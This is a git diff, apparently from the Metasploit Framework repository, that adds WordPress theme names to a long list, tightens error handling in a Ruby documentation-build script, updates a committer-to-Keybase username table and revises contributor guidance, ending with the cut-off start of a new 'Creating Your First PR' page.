 super-bloggers-3-a-twenty-twelve-child-theme
 super-blue
+super-business
+super-captain
 super-construction
 super-light
 super-minimal
+super-salon
 super-sexy
 super-simple
 super-simple-photo-blog
 super-theme
 superads-lite
 superb
+superb-ecommerce
 superb-education
 superb-landingpage
 superb-lite
 superb-marketplace
 superbiz
+superblank
 superblog
 superblog-compact
 superblogging
@@ -18916,6 +20183,7 @@ supermag
 supermagpro
 supermarket
 supermarket-ecommerce
+supermarket-zone
 supermart-ecommerce
 supermodne
 supermoon
@@ -18929,6 +20197,7 @@ supersport
 superstore
 supertheme
 superthemes
+superware
 supesu
 suporte-eduardo
 supplier
@@ -18982,7 +20251,9 @@ sweetheat
 sweetheme
 sweetly-theme-uri-httpcolorlib-comwpthemessparkling
 sweetly-uri-httpcolorlib-comwpthemessparkling
+sweetsi-lite
 sweettoothy
+sweetweb
 swell-free
 swell-lite
 swet
@@ -19001,8 +20272,10 @@ swiftpress
 swiftray
 swiftray-lite
 swifty-site-designer
+swimming-pool
 swimschool
 swing-lite
+swingpress
 swipewp
 swirly
 swirly-glow-thingys
@@ -19031,6 +20304,7 @@ symbol
 sympalpress-lite
 sympathy-blue
 symphony
+symplify-blog
 syn
 synapse
 synchronization
@@ -19039,12 +20313,15 @@ synergy-blue-by-k9
 synergy-green-by-k9
 synergy-pink-by-k9
 syntax
+syrus
 system-7
 sywon
 szareprzenikanie
 szbenz
+t-shirt-clothing
 ta-business
 ta-dailyblog
+ta-mag
 ta-magazine
 ta-newspaper
 ta-portfolio
@@ -19062,7 +20339,10 @@ tacte
 tadaima
 tadpole
 tafri-travel
+tafri-travel-blog
 tagebuch
+tagora
+tagora-business
 taha-yoyo
 tai
 tai-simpleblog
@@ -19070,6 +20350,7 @@ tai-simpletheme
 tailor
 tailored
 tailwind
+taina
 tainacan
 tainacan-interface
 taiyariclasses-uri-httpsthemepalace-comdownloadscorporate-education
@@ -19106,6 +20387,7 @@ tannistha
 tantyyellow
 tanuki-base
 tanzaku
+tanzakufse
 tanzanite
 tanzii
 tapied-child
@@ -19139,6 +20421,8 @@ tastybite
 tastyplacement
 tastypress
 tasveer
+tatoo-lite
+tattoo-designer
 tattoo-expert
 tattoo-wow
 tattoos
@@ -19146,6 +20430,7 @@ tatu
 tatva-lite
 tavisha
 taxcan
+taxi-booking
 taylor
 tbiz
 tc-e-commerce-shop
@@ -19202,6 +20487,7 @@ techengage
 techfind
 techieblog
 techified
+techine
 techism
 techlauncher
 techlicioushosting
@@ -19225,6 +20511,7 @@ technogatiadsenseready
 technogenous-lite
 technoholic
 technology
+technology-techup
 technology-travel-food
 technosmart
 technosmart-lite
@@ -19240,6 +20527,7 @@ techtree2
 techtune
 techtunes
 techup
+techup-saw
 techwear-theme-uri-httpthemeisle-comthemeszerif-lite
 techwormcorporate
 techy-people
@@ -19259,14 +20547,22 @@ teczilla-corporate
 teczilla-creative
 teczilla-dark
 teczilla-finance
+teczilla-industry
+teczilla-lite
+teczilla-marketing
 teczilla-organization
 teczilla-portfolio
+teczilla-saas
+teczilla-seo
+teczilla-software
 teczilla-startup
+teczilla-technology
 teczilla-trading
 tedi
 tedxwc
 teen-seventeen
 teerex
+teesa
 tehno-njuz
 tehnonjuz
 tehran
@@ -19293,6 +20589,7 @@ temanyadaengganteng
 temauno
 tembesi
 temka
+temp-mail-x
 temp8
 tempera
 templastic
@@ -19309,8 +20606,10 @@ templateozzamo16
 templatetoaster
 tempo
 temptation
+ten-blog
 tenacity
 tender-spring
+tendo
 tenera
 tenet
 tenocation
@@ -19371,8 +20670,14 @@ tg-green-light
 tg-orange-mini
 tgame
 tgmpa_test
+th-big
+th-big-shop
 th-blogging
+th-hot-shop
+th-jot
+th-open
 th-store
+th-top
 thai-spa
 thallein
 thalliumwp
@@ -19390,6 +20695,7 @@ the-adjustbar-two-column-left-right-side-bar-default-widget
 the-adventure-journal
 the-angle
 the-architect-website
+the-art-gallery
 the-artister
 the-ataraxis
 the-authority
@@ -19446,6 +20752,7 @@ the-event-construction
 the-event-dark
 the-evol
 the-evol-theme
+the-evolution
 the-exe
 the-falcon
 the-fash-blog
@@ -19458,12 +20765,14 @@ the-fundamentals-of-graphic-design
 the-funk
 the-gap
 the-gecko
+the-gig
 the-glory
 the-glory-template
 the-go-green-theme
 the-good-earth
 the-guru-theme
 the-h
+the-headlines
 the-hipster-blog
 the-hotel
 the-html5-boilerplate
@@ -19508,6 +20817,7 @@ the-next-university
 the-nice-one
 the-night-watch
 the-other-blog-lite-red
+the-pack-element
 the-pet-clinic
 the-pinata
 the-portfolio
@@ -19532,6 +20842,8 @@ the-shopping
 the-simple-things
 the-skeleton
 the-sonic
+the-store
+the-styled-blog
 the-sunflower-theme
 the-swallow
 the-theme
@@ -19581,6 +20893,7 @@ thecompany
 thefabbrick
 thefour-lite
 thegujjar
+thehideout
 theia-lite
 thekit
 theleul
@@ -19632,6 +20945,7 @@ themetastico
 themetiger-fashion
 themetim
 themevid
+themework
 themey
 themia-lite
 themia-pro
@@ -19686,6 +21000,7 @@ thewin
 theworldin35mm
 thikcha-bootstrap
 thin-mint
+thinity
 think-blue
 think-me
 thinker
@@ -19696,6 +21011,7 @@ third
 third-eye
 third-son
 third-style
+thirteen-blog
 thirteenmag
 thirtyseventyeight
 this-christmas
@@ -19744,6 +21060,7 @@ tiffany-lite
 tifology
 tiga
 tiger
+tigtiger
 tijaji
 tijarat-business
 tiki-time
@@ -19868,15 +21185,19 @@ toommorel-lite
 toommorel-theme-by-inkthemes
 toothpaste
 top-blog
+top-blogger
 top-business
+top-charity
 top-classic-cars
 top-event
 top-jewelry
 top-language-jobs-2
 top-mag
+top-newspaper
 top-premium-photoblog
 top-shop
 top-store
+top-stories
 top-story
 top-travel
 top5revs
@@ -19919,6 +21240,7 @@ tour
 tour-agency
 tour-operator
 tour-package
+tour-travel-agent
 tour-traveler
 tourable
 tourag
@@ -19935,6 +21257,7 @@ tove
 township-lite
 tp-autumn
 tp-blue
+tp-branded
 tp-iphone
 tp-philosophy
 tp-purpure
@@ -19955,6 +21278,7 @@ trade
 trade-business
 trade-hub
 trade-line
+trade-more
 tradebiz
 tradeup
 trading
@@ -19992,6 +21316,7 @@ transport-lite
 transport-movers
 transport-solutions
 transportation
+transportation-shipment
 transportex
 transporty
 travbo
@@ -20001,6 +21326,7 @@ travel-ace
 travel-advisor
 travel-agency
 travel-agency-booking
+travel-agent
 travel-and-tour
 travel-away
 travel-base
@@ -20016,9 +21342,11 @@ travel-booking
 travel-buzz
 travel-by-frelocaters
 travel-canvas
+travel-charm
 travel-club
 travel-company
 travel-diaries
+travel-diary
 travel-escape
 travel-eye
 travel-eye12312312
@@ -20027,6 +21355,7 @@ travel-guide
 travel-hub
 travel-in-italy
 travel-in-love
+travel-init
 travel-insight
 travel-inspired
 travel-is-my-life
@@ -20054,15 +21383,18 @@ travel-to-egypt
 travel-tour
 travel-tour-pro
 travel-tourism
+travel-trail
 travel-trek
 travel-trip-lite
 travel-ultimate
+travel-vlogger
 travel-voyage
 travel-way
 traveladdict-lite
 traveladdict-liteliye
 travelagency
 travelair
+travelbee
 travelberg
 travelbiz
 travelblog
@@ -20072,10 +21404,13 @@ traveler-blog-lite
 travelera-lite
 travelers
 travelers-blog
+travelholic
 travelia
 travelifestyle
 travelify
 travelingist
+travelism
+travelistic
 travelkit
 travellable
 travellandia
@@ -20095,6 +21430,7 @@ travern
 traverse-blog
 traverse-diary
 traversify-lite
+travey
 travia
 traza
 trcapital-lite
@@ -20116,21 +21452,26 @@ trend-shop
 trending
 trending-blog
 trending-mag
+trending-news
 trendmag
 trendmag-lite
 trendpress
 trendshop
 trendy
+trendy-blog
 trendy-green
+trendy-news
 tressimple
 treville
 treviso
+trex
 trexo
 triad
 trial
 trial-house-bootstrap-classic
 trialhouse-bootstrap-classic
 triangled
+triangulate
 tribal
 tribbiani
 tribe
@@ -20175,6 +21516,7 @@ tropical-beach-theme
 tropical-paradise
 tropicala
 tropicana
+trouvelot
 truble
 true-blue
 true-blue-hue
@@ -20248,6 +21590,7 @@ tutepress
 tutifruti
 tuto
 tutor
+tutor-academy
 tutor-starter
 tutorial
 tutorial-portfolio
@@ -20255,6 +21598,7 @@ tutorial-theme
 tutorialesmanu
 tutorstarter
 tutsup-two
+tutu
 tuấn-hiệp
 tv-boy-explode-black
 tw
@@ -20283,9 +21627,11 @@ tweetpress
 tweetsheep
 twelve
 twelve-14
+twelve-blog
 twelve-pixel
 twentiy-nineteen
 twenty
+twenty-17
 twenty-eightteen
 twenty-eleven
 twenty-eleven-alternative
@@ -20432,6 +21778,7 @@ twenty-twenty-one-child
 twenty-twenty-one-sidebar
 twenty-twenty-onee
 twenty-twenty-plus
+twenty-twenty-two-child
 twenty-twenty20
 twenty-two-five
 twenty11
@@ -20444,6 +21791,7 @@ twentyfourteen
 twentyfourteen-child
 twentynineteen
 twentyseventeen
+twentyseventeen-child
 twentysixteen
 twentysixteen-custom
 twentysixteen-customed-for-kishoredbn
@@ -20460,6 +21808,9 @@ twentytwelve-schema-org-child
 twentytwenty
 twentytwentyone
 twentytwentyone-child-wooden
+twentytwentythree
+twentytwentytwo
+twentytwentytwowcs2022
 twentyxlarge
 twentyxs
 twentyxs-child
@@ -20573,6 +21924,7 @@ ultra-seven
 ultrabootstrap
 ultralight
 ultrapress
+ultravel
 um
 uma
 uma-wp-theme
@@ -20588,6 +21940,7 @@ unakit
 unar
 unar-lite
 unax
+unblock
 unbox-tours
 uncode
 uncode-lite
@@ -20620,7 +21973,9 @@ undistracted-zen
 unfocus-green
 unfocused-blues
 unfold
+unfoldx
 uni-education
+uniblock
 unicare-lite
 unicon
 unicon-lite
@@ -20663,12 +22018,14 @@ universam-store-leader
 universe
 universe2
 university
+university-education-hub
 university-hub
 university-max
 university-web8
 university-wp
 university-zone
 unknown-uri-httpdemo-webulo1us-inabar1is
+unlimita
 unlimited
 unmarked
 unnamed-lite
@@ -20704,7 +22061,9 @@ upcart
 update-tucson
 updown-cloud
 upeo
+upeo-blog
 upeo-business
+upfront
 upfrontwp
 upify
 upliftingblog
@@ -20751,6 +22110,7 @@ utheme
 uticawp
 utieletronica
 utility
+utility-techup
 utilys
 utopia
 utouch-lite
@@ -20771,6 +22131,7 @@ vacation-lite
 vacation-lite1
 vacuous
 vagabond
+vagante
 vaje
 vajra
 valazi
@@ -20805,6 +22166,7 @@ vantage-premium
 vanty
 vape-multipurpose-minimal-shop
 vape-theme
+varela-blog
 varg
 variant
 variant-landing-page
@@ -20850,6 +22212,7 @@ vegeta
 veggie-lite
 veggie-lite1-2
 veggie-poem
+veggo-shop
 vei-do-ceu
 vei-do-saco
 veikals
@@ -20887,6 +22250,7 @@ verbosa
 verdant
 verge
 veridicta
+veritable
 veritas
 verity
 vermillon
@@ -20895,6 +22259,7 @@ veroxa
 versal
 versatile-business
 versatile-business-dark
+versatile-corporate
 versitility
 verso
 verso-lite
@@ -20929,8 +22294,10 @@ vg-sento
 viable-blog
 viable-fame
 viable-lite
+viaggiando
 viaggio-lite
 viala
+viandante
 viavi-blog
 vibe
 vibefolio-teaser-10
@@ -20948,14 +22315,19 @@ victoriana
 video
 video-adventure-theme
 video-blog
+video-podcasting
 video-sport-total
+video-streaming
 video-theme-adventure
 videoblog
 videobuzz
+videocast
 videofire
 videofy
 videographex
 videography
+videography-filmmaker
+videolife
 videomag
 videomaker
 videomax
@@ -20963,6 +22335,7 @@ videonowlite
 videoplace
 videopress
 videopro-shared-by-themes24x7-com
+videoshare
 videostories
 videoxl-free
 vidmag
@@ -20987,6 +22360,8 @@ viktor-classic
 viktor-lite
 villa-estate
 village
+villanelle
+villar
 vilva
 vina
 vinay
@@ -21005,6 +22380,7 @@ vintage-stamps-theme
 vintage-wall
 vintage1-camera1
 vintagemag
+vinyl-news-mag
 violet
 violet-fashion-theme
 violinesth
@@ -21054,6 +22430,7 @@ vishnu
 visia-store
 vision
 vision-lite
+visionwp
 visitpress
 viso
 viso-theme
@@ -21085,6 +22462,7 @@ vivex
 vivid-blog
 vivid-night
 vivita
+vivre
 vixka
 vixy-catch
 vizuit
@@ -21139,6 +22517,7 @@ vw-app-lite
 vw-application
 vw-automobile-lite
 vw-bakery
+vw-bakery-blocks
 vw-blog-magazine
 vw-book-store
 vw-car-rental
@@ -21149,6 +22528,7 @@ vw-consulting
 vw-corporate-business
 vw-corporate-lite
 vw-corporate-lite-2
+vw-dark
 vw-dentist
 vw-driving-school
 vw-eco-nature
@@ -21169,7 +22549,10 @@ vw-healthcare
 vw-hospital-lite
 vw-hotel
 vw-interior-designs
+vw-job-board
 vw-kids
+vw-kids-store
+vw-kindergarten
 vw-landing-page
 vw-lawyer-attorney
 vw-life-coach
@@ -21180,6 +22563,7 @@ vw-minimalist
 vw-mobile-app
 vw-mobile-app-red-canoa
 vw-newspaper
+vw-nutritionist-coach
 vw-one-page
 vw-painter
 vw-parallax
@@ -21229,9 +22613,11 @@ w018
 w1redtech
 w3css
 w3css-starter
+w3csspress
 w3t-fuseki
 w7c_iz
 wabc
+wabi
 wabi-sabi
 wacko
 wacool-hack-on-the-net
@@ -21245,6 +22631,8 @@ walili
 walker-charity
 walkermag
 walkernews
+walkerpress
+walkershop
 wall-street
 wallflower
 wallgreen
@@ -21266,6 +22654,7 @@ wapuu1-child
 waqas
 ward
 wardrobe
+warehouse-cargo
 warm-heart
 warm-home
 warm-ribbon
@@ -21279,6 +22668,7 @@ washing-center
 washington
 wasif
 wasteland
+watch-store
 watchertheme
 watches
 water
@@ -21287,6 +22677,7 @@ water-lily
 water-mark
 water-sports-club
 watercolor
+waterlava
 waterloo
 waternymph-and-dolphin
 waterside
@@ -21321,16 +22712,20 @@ web-20
 web-20-blue
 web-20-pinky
 web-20-simplified
+web-agency-elementor
 web-app
 web-artist
 web-conference
 web-design
 web-design-web8
+web-designer
 web-developer
+web-developer-elementor
 web-development
 web-grapple
 web-host
 web-hosting
+web-hosting-lite
 web-hosting-theme
 web-log
 web-minimalist-200901
@@ -21383,6 +22778,7 @@ webstarslite
 webstarterkitthirteen
 webstore
 webstrap
+webstudio-gtns
 webswp
 webtacs-1
 weburangbogor
@@ -21392,12 +22788,14 @@ wecare
 wecodeart
 wecodeart-framework
 wecodeart-old
+weddi-pro
 wedding
 wedding-band
 wedding-bells
 wedding-bells-lite
 wedding-bride
 wedding-couples
+wedding-hall
 wedding-happily-ever-after
 wedding-journal
 wedding-party
@@ -21419,10 +22817,14 @@ wedshot
 wefoster
 weh-lite
 wehpy
+wei
+weight-loss
 weight-loss-tea
 welcome
 welcomeholidays-uri-httpswordpress-orgthemestwentyseventeen
+welding-services
 well-being
+well-book
 well-built
 well-rounded-redux-blue
 wellbeing
@@ -21432,13 +22834,16 @@ wellness
 wellness-child
 wellness-coach-lite
 wen-associate
+wen-biz
 wen-business
 wen-commerce
 wen-corporate
 wen-travel
 wen-travel-blog
+wen-travel-corporate
 wen-travel-dark
 wen-travel-modern
+wen-travel-photography
 wepora
 werka
 west
@@ -21526,6 +22931,7 @@ whitey08-green
 whitish
 whitish-lite
 whitney
+wholesales
 wholly
 whoop
 why-hello-there
@@ -21634,6 +23040,7 @@ wittgenstein
 wix
 wiz-ecommerce
 wiziapp-smooth-touch
+wk-finance
 wk-wow
 wkeducation
 wlow
@@ -21649,6 +23056,7 @@ womenmagaz
 wonder
 wondrous
 woo
+woo-shop
 woobie
 wooclean
 woocommerce-starter
@@ -21659,6 +23067,8 @@ wood-master
 wood-people
 wood-theme
 woodberry
+woodcraft-lite
+woodcut
 wooden
 wooden-and-white-style
 wooden-by-jason
@@ -21682,12 +23092,14 @@ woodsauce
 woodword
 woodwork-lite
 woodworking
+woodworking-carpenter
 woody
 woody-smooth
 wooeco
 wooketing
 woolab
 woomart
+wooshop-wp
 woosti
 woostifi
 woostify
@@ -21744,6 +23156,7 @@ wordpress-unix
 wordpress-video-theme
 words
 words-blog
+words-lite
 wordsmith
 wordsmith-anvil
 wordsmith-blog
@@ -21755,9 +23168,11 @@ wordzilla
 worf
 work-and-travel
 workart
+workart-business
 workflow
 workfree
 working-papers
+workout-lite
 workpress
 worksblog
 workspace-theme
@@ -21820,6 +23235,7 @@ wp-boxes
 wp-brown
 wp-bs-mix-news
 wp-business
+wp-business-builder
 wp-c_green
 wp-castle
 wp-casual
@@ -21896,7 +23312,9 @@ wp-media-twentyfive
 wp-meliora
 wp-metrics
 wp-metroui
+wp-minimalist
 wp-mint-magazine
+wp-moose
 wp-movies
 wp-mozilla-community-theme-v2
 wp-my-business
@@ -21904,6 +23322,7 @@ wp-nathy
 wp-news-classic
 wp-news-stream
 wp-newsmagazine
+wp-newspaper
 wp-nice-mix
 wp-notebook
 wp-notes
@@ -22009,12 +23428,15 @@ wpbyd
 wpcake
 wpcan
 wpchimp-countdown
+wpckid
 wpclick
 wpcmart
 wpcmedical
 wpcomic
+wpconfigurator
 wpcount
 wpcouponcode
+wpcpet
 wpcplant
 wpcrest
 wpcrux
@@ -22034,6 +23456,7 @@ wpf-authority
 wpf-flaty
 wpf-ultraresponsive
 wpfastslide
+wpflavour
 wpfolio
 wpfolio-three
 wpgalaxy-magazine
@@ -22041,12 +23464,14 @@ wpgist
 wpgrass
 wpgumby
 wpherald_lite
+wphester
 wpi-aboutme
 wpideo
 wpindexatic
 wping-metro
 wpj
 wpjobman
+wpkites
 wpl-twentyeight
 wplab-pro-wpcms
 wplabo-aries
@@ -22128,6 +23553,7 @@ writee
 writee-child
 writee-grid
 writee-parsi
+writemag
 writer
 writer-blog
 writera
@@ -22138,6 +23564,7 @@ writers-blogily
 writers-desk
 writers-quill
 writerstrap
+writeup
 writhem-blog
 writing-board
 writing-desk
@@ -22189,9 +23616,11 @@ x-mas
 x-portfolio
 x-shop
 x-store
+x-t9
 x-view
 x2
 x2-lite
+x3p0-reflections
 x6
 xabstract
 xaklin
@@ -22218,6 +23647,7 @@ xiando-one
 xianrensea
 xicoofficial
 xid1theme
+xidea
 xin
 xin-magazine
 xinxin
@@ -22242,6 +23672,8 @@ xpand-blog
 xpand-news
 xperson-lite
 xpinkfevertlx
+xpomagazine
+xposenews
 xpressmag
 xpro
 xproweb
@@ -22323,6 +23755,7 @@ yepza
 yes-co-ores-theme
 yesp
 yeti-5
+yeti-blog
 yeuloli
 yeyita
 yg-desire
@@ -22330,10 +23763,12 @@ yhsnews
 yifengxuan
 yinyang
 yith-proteo
+yith-wonder
 yleave
 ymac
 ymflyingred
 ymoo
+ynet-contractor
 yo-manga
 yo-yo-po
 yo_fik
@@ -22341,6 +23776,7 @@ yocto
 yoga
 yoga-coach
 yoga-fitness
+yoga-park
 yoga-studio
 yoga_guru
 yogaclub-lite
@@ -22359,7 +23795,9 @@ yomel
 yonarex
 yoneko
 yoo-developer
+yordered-desktop
 york-lite
+york-press
 yosemite
 yosemite-lite
 yosemite-lite1
@@ -22387,8 +23825,13 @@ yugen
 yui
 yui-grid-css
 yuiyui
+yuki
+yuki-agency
+yuki-magazine
 yukti
 yule
+yuma
+yuma-personal
 yume
 yume-tan
 yummy
@@ -22463,6 +23906,7 @@ zeestyle
 zeestylepro
 zeesynergie
 zeetasty
+zeever
 zeevision
 zeko-lite
 zelia
@@ -22485,6 +23929,7 @@ zenga-club
 zengardenwedding
 zenhabits-reloaded
 zenimalist
+zenithwp
 zenlife
 zenlite
 zenmacrame
@@ -22533,6 +23978,7 @@ zetaone
 zeus
 zfirst
 zgrey
+zheme
 zhuti
 zica-lite-one-page
 zifer-child
@@ -22570,7 +24016,9 @@ zm-tech-black-red
 zm-theme
 zmartoffcial
 zmooncake
+zmt-modular
 znktheme-uri-httpssketchthemes-compremium-themesappointment-booking-wordpress-theme-for-consultants
+zodiac-astrology
 zodiac-lite
 zoe
 zoko
@@ -32,6 +32,9 @@ module Build
    end
  end

+  class ConfigValidationError < StandardError
+  end
+
  # Configuration for generating the new website hierarchy, from the existing metasploit-framework wiki
  class Config
    include Enumerable
@@ -43,34 +46,34 @@ module Build
    def validate!
      configured_paths = all_file_paths
      missing_paths = available_paths.map { |path| path.gsub("#{WIKI_PATH}/", '') } - ignored_paths - existing_docs - configured_paths
-      raise "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?
+      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?

      each do |page|
        page_keys = page.keys
        allowed_keys = %i[old_wiki_path path new_base_name nav_order title new_path folder children has_children parents]
        invalid_keys = page_keys - allowed_keys
-        raise "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
+        raise ConfigValidationError, "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
      end

      # Ensure unique folder names
      folder_titles = to_enum.select { |page| page[:folder] }.map { |page| page[:title] }
      duplicate_folder = folder_titles.tally.select { |_name, count| count > 1 }
-      raise "Duplicate folder titles, will cause issues: #{duplicate_folder}" if duplicate_folder.any?
+      raise ConfigValidationError, "Duplicate folder titles, will cause issues: #{duplicate_folder}" if duplicate_folder.any?

      # Ensure no folder titles match file titles
      page_titles = to_enum.reject { |page| page[:folder] }.map { |page| page[:title] }
      title_collisions = (folder_titles & page_titles).tally
-      raise "Duplicate folder/page titles, will cause issues: #{title_collisions}" if title_collisions.any?
+      raise ConfigValidationError, "Duplicate folder/page titles, will cause issues: #{title_collisions}" if title_collisions.any?

      # Ensure there are no files being migrated to multiple places
      page_paths = to_enum.reject { |page| page[:path] }.map { |page| page[:title] }
      duplicate_page_paths = page_paths.tally.select { |_name, count| count > 1 }
-      raise "Duplicate paths, will cause issues: #{duplicate_page_paths}" if duplicate_page_paths.any?
+      raise ConfigValidationError, "Duplicate paths, will cause issues: #{duplicate_page_paths}" if duplicate_page_paths.any?

      # Ensure new file paths are only alphanumeric and hyphenated
      new_paths = to_enum.map { |page| page[:new_path] }
      invalid_new_paths = new_paths.reject { |path| File.basename(path) =~ /^[a-zA-Z0-9_-]*\.md$/ }
-      raise "Only alphanumeric and hyphenated file names required: #{invalid_new_paths}" if invalid_new_paths.any?
+      raise ConfigValidationError, "Only alphanumeric and hyphenated file names required: #{invalid_new_paths}" if invalid_new_paths.any?
    end

    def available_paths
@@ -293,6 +296,15 @@ module Build
        '@scanner',
        '@yieldparam',
        '@yieldreturn',
+        '@compressed',
+        '@content',
+        '@path',
+        '@sha1',
+        '@type',
+        '@git_repo_uri',
+        '@git_addr',
+        '@git_objs',
+        '@refs',
      ]

      # Replace any dangling github usernames, i.e. `@foo` - but not `[@foo](http://...)` or `email@example.com`
@@ -337,7 +349,12 @@ module Build
    # - Converts the existing Wiki markdown pages into a Jekyll format
    # - Optionally updates the existing Wiki markdown pages with a link to the new website location
    def run(config, options = {})
-      config.validate!
+      begin
+        config.validate!
+      rescue
+        puts "[!] Validation failed. Please verify navigation.rb is valid, as well as the markdown file"
+        raise
+      end

      # Clean up new docs folder in preparation for regenerating it entirely from the latest wiki
      result_folder = File.join('.', 'docs')
@@ -9,35 +9,40 @@ Keybase.io is used by Metasploit as an easy way to verify identities of committe

 | Github Username                                   | Keybase.io Username                                |
 | ------------------------------------------------- | -------------------------------------------------- |
-| [@acammack-r7](https://github.com/acammack-r7)    | [acammackr7](https://keybase.io/acammackr7)        |
+| [@adfoster-r7](https://github.com/adfoster-r7)    | [adfosterr7](https://keybase.io/adfosterr7)        |
 | [@bcoles](https://github.com/bcoles)              | [bcoles](https://keybase.io/bcoles)                |
-| [@busterb](https://github.com/busterb)            | [busterb](https://keybase.io/busterb)              |
 | [@bwatters-r7](https://github.com/bwatters-r7)    | [bwatters](https://keybase.io/bwatters)            |
 | [@ccondon-r7](https://github.com/ccondon-r7)      | [catc0n](https://keybase.io/catc0n)                |
-| [@cdelafuente-r7](https://github.com/cdelafuente-r7)|[cdelafuente](https://keybase.io/cdelafuente)    |
+| [@cdelafuente-r7](https://github.com/cdelafuente-r7)|[cdelafuente](https://keybase.io/cdelafuente)     |
+| [@cgranleese-r7](https://github.com/cgranleese-r7)|                                                    |
 | [@chiggins](https://github.com/chiggins)          | [chiggins](https://keybase.io/chiggins)            |
-| [@egypt](https://github.com/egypt)                | [egypt](https://keybase.io/egypt)                  |
+| [@dwelch-r7](https://github.com/dwelch-r7)        | [dwelchr7](https://keybase.io/dwelchr7)            |
+| [@erran-r7](https://github.com/erran-r7)          | [err7n](https://keybase.io/err7n)                  |
+| [@ekelly-rapid7](https://github.com/ekelly-rapid7)|                                                    |
 | [@FireFart](https://github.com/FireFart)          | [firefart](https://keybase.io/firefart)            |
 | [@Green-m](https://github.com/Green-m)            | [green-m](https://keybase.io/green_m)              |
 | [@gwillcox-r7](https://github.com/gwillcox-r7)    | [grantwillcox](https://keybase.io/grantwillcox)    |
 | [@h00die](https://github.com/h00die)              | [h00die](https://keybase.io/h00die)                |
-| [@jbarnett-r7](https://github.com/jbarnett-r7)    | [jmbarnett](https://keybase.io/jmbarnett)          |
+| [@hwilson-r7](https://github.com/hwilson-r7)      |                                                    |
+| [@jharris-r7](https://github.com/jharris-r7)      |                                                    |
+| [@jheysel-r7](https://github.com/jheysel-r7)      |                                                    |
 | [@jmartin-r7](https://github.com/jmartin-r7)      | [jmartinr7](https://keybase.io/jmartinr7)          |
-| [@lsato-r7](https://github.com/lsato-r7)          | [louissato](https://keybase.io/lsato)              |
 | [@Meatballs1](https://github.com/Meatballs1)      | [meatballs](https://keybase.io/meatballs)          |
 | [@mkienow-r7](https://github.com/mkienow-r7)      | [inokii](https://keybase.io/inokii)                |
 | [@mubix](https://github.com/mubix)                | [mubix](https://keybase.io/mubix)                  |
+| [@nhkaraka-r7](https://github.com/nhkaraka-r7)    |                                                    |
 | [@OJ](https://github.com/OJ)                      | [oj](https://keybase.io/oj)                        |
+| [@rhodgman-r7](https://github.com/rhodgman-r7)    | [rhodgmanr7](https://keybase.io/rhodgmanr7)        |
 | [@scriptjunkie](https://github.com/scriptjunkie)  | [scriptjunkie](https://keybase.io/scriptjunkie)    |
 | [@sgonzalez-r7](https://github.com/sgonzalez-r7)  | [essgee](https://keybase.io/essgee)                |
 | [@smashery](https://github.com/smashery)          | [smashery](https://keybase.io/smashery)            |
+| [@smcintyre-r7](https://github.com/smcintyre-r7)  |                                                    |
 | [@space-r7](https://github.com/space-r7)          | [shelbyp](https://keybase.io/shelbyp)              |
-| [@tdoan-r7](https://github.com/tdoan-r7)          | [doanosaur](https://keybase.io/doanosaur)          |
+| [@tas-r7](https://github.com/tas-r7)              |                                                    |
 | [@timwr](https://github.com/timwr)                | [timwr](https://keybase.io/timwr)                  |
 | [@todb-r7](https://github.com/todb-r7)            | [todb](https://keybase.io/todb)                    |
 | [@void-in](https://github.com/void-in)            | [void_in](https://keybase.io/void_in)              |
-| [@wchen-r7](https://github.com/wchen-r7)          | [wchenr7](https://keybase.io/wchenr7)              |
-| [@zeroSteiner](https://github.com/zeroSteiner)    | [zerosteiner](https://keybase.io/zerosteiner)      |
+| [@zgoldman-r7](https://github.com/zgoldman-r7)    |                                                    |

 Note, keybase.io does **not require** your private key to prove your GitHub
 identity. Actually sharing your private key with Keybase.io is a matter of
@@ -46,7 +51,7 @@ thoughtful argument [for][pro-sharing].

 # Tracking criteria

-In order to get [@bcook-r7](https://github.com/bcook-r7) to track your key, you
+In order to get [@smcintyre-r7](https://github.com/smcintyre-r7) to track your key, you
 alert him to its existence through some non-GitHub means, and verify your
 GitHub username. That's all there is to it.

@@ -33,7 +33,7 @@ Commit rights are granted via votes on the committers mailing list. Voting recor
 1. Any current committer may nominate any one person as a potential committer by writing to the committers mailing list.
 2. The nominator must provide a justification for committer rights, and include the nominee's e-mail address.
 2. After some discussion on the mailing list, there will be a group vote on the nominee.
-2. The Metasploit manager (@busterb) will inform the new committer of their new commit rights and responsibilities, add the new committer to the appropriate ACL groups and mailing lists, and inform the mailing list of the successful completion of these tasks.
+2. The Metasploit manager ([@smcintyre-r7](https://github.com/smcintyre-r7)) will inform the new committer of their new commit rights and responsibilities, add the new committer to the appropriate ACL groups and mailing lists, and inform the mailing list of the successful completion of these tasks.

 Committers introduced in this way will have commit rights to the [public framework repositories](https://github.com/orgs/rapid7/teams/framework-public-committers/repositories).

@@ -6,6 +6,9 @@ However, tackling core Metasploit Framework bugs or particularly squirrelly expl

 Metasploit is a tool by and for hackers, but the hackers that maintain it also happen to be software engineers. So, we have some hopefully easy-to-remember Do's and Don'ts in [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md). Read up on those.

+# Making Your First PR
+Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit. You can learn more about making your first PR at [[Creating Your First PR]]
+
 # Server exploits

 Server exploits are always in demand; why bother with complicated social engineering campaigns when you can go straight to the pain point of a vulnerable network. Here are some search queries to get you started:
@@ -53,9 +56,6 @@ Again, there's always room on #metasploit on Freenode. Be helpful with the quest

 You probably shouldn't run proof of concept exploit code you find on the Internet on a machine you care about in a network you care about. That is generally considered a Bad Idea. You also probably shouldn't use your usual computer as a target for exploit development, since you are intentionally inducing unstable behavior.

-Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit.  You can learn how to create one here:
-[[Landing-Pull-Requests]]
-
 Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.

 If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/kb/answer/registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
@@ -0,0 +1,136 @@
+# Creating Your First PR - An Intro To Git and the PR Process
+## Intro
+Congratulations fellow traveler, so you're interested in contributing to Metasploit eh? Well welcome aboard, its going to be a fun ride!
+You'll learn lots along the way but here are some tips and tricks that should help you get started with making your first PR request
